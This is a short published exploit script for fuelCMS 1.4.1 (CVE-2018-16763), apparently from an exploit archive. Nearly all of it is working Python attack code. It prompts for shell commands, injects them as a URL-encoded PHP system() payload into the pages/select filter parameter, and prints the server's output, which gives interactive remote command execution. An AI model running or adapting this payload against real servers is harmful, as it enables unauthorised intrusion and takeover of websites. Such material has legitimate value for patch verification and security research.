Share
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution  
# Date: 2019-07-19  
# Exploit Author: 0xd0ff9  
# Vendor Homepage: https://www.getfuelcms.com/  
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1  
# Version: <= 1.4.1  
# Tested on: Ubuntu - Apache2 - php5  
# CVE : CVE-2018-16763  
  
  
import requests  
import urllib  
  
url = "http://127.0.0.1:8881"  
def find_nth_overlapping(haystack, needle, n):  
start = haystack.find(needle)  
while start >= 0 and n > 1:  
start = haystack.find(needle, start+1)  
n -= 1  
return start  
  
while 1:  
xxxx = raw_input('cmd:')  
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"  
proxy = {"http":"http://127.0.0.1:8080"}  
r = requests.get(burp0_url, proxies=proxy)  
  
html = "<!DOCTYPE html>"  
htmlcharset = r.text.find(html)  
  
begin = r.text[0:20]  
dup = find_nth_overlapping(r.text,begin,2)  
  
print r.text[0:dup]